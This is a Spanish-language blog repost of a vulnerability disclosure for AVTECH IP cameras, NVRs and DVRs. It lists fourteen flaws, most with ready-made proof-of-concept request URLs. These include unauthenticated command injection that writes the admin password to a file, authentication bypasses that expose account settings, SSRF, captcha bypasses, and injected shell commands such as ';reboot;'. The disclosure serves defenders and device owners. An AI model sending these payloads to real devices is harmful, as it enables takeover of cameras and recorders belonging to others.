Producto afectado:
Plataforma y Firmware en cualquier dispositivo camaras IP , NVR, DVR marca AVTECH
Avtech es el segundo término de búsqueda mas popular en Shodan. De acuerdo con Shodan, mas de 130,000 dispositivos AVTECH estan expuestos a internet.
Listado de Vulnerabilidades
1) Plaintext storage of administrative password 2) Missing CSRF protection 3) Unauthenticated information disclosurePOC:
GET /cgi-bin/nobody/Machine.cgi?action=get_capability
4) Unauthenticated SSRF in DVR devices
POC:
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==
5) Unauthenticated command injection in DVR devices
POC:
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin
6) Authentication bypass #1
7) Authentication bypass #2
POC:
http://<device_ip>/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
8) Unauthenticated file download from web root
POC:
http://<device_ip>/cgi-bin/cgibox?.cab
http://<device_ip>/cgi-bin/cgibox?.cab
9) Login captcha bypass #1
POC:
http://<device_ip>/cgi-bin/nobody/VerifyCode.cgi?account=<b64(username:password)>&login=quick
10) Login captcha bypass #2
11) Authenticated command injection in CloudSetup.cgi
POC:
http://<device_ip>/cgi-bin/supervisor/CloudSetup.cgi?exefile=ps
12) Authenticated command injection in adcommand.cgi
POC:
POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
Host: <device_ip>
Content-Length: 23
Cookie: SSID=YWRtaW46YWRtaW4=
DoShellCmd "strCmd=ps&"
13) Authenticated command injection in PwdGrp.cgi
POC:
http://<device_ip>/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN
14) HTTPS used without certificate verification
fuente:http://www.search-lab.hu/
Video
fuente:http://www.search-lab.hu/
0 comentarios :
Publicar un comentario